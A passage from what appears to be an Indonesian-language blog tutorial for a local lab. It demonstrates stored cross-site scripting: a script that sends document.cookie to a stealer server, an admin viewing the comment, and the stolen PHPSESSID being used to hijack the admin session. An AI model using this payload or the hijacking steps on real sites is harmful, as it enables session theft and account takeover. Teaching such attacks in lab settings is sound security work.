<script>
fetch("http://localhost:1337/steal?c=" + document.cookie)
</script>
Submit komentar sebagai attacker.
c. Akses view_comments.phpÂ
Admin membuka halaman komentar → skrip dijalankan → cookie dikirim ke stealer.js.Â
Lihat Cookie Dicuri
Cek isi file stolen_cookies.txt(otomatis terbuat) di folder stealer_server/:
Stolen cookie: PHPSESSID=abc123456xyz
Gunakan Cookie untuk Bajak Sesi
Buka browser baru/incognito.
Masuk ke login.php
Tekan F12 → buka tab Application → pilih Cookies → edit:
Nama: PHPSESSID
Nilai: (isi dari stolen cookie)
Jika sesi PHPSESSID valid, kamu akan melihat halaman dashboard admin!Â
Beri Komentar
Belum ada komentar. Jadilah yang pertama untuk memberikan komentar!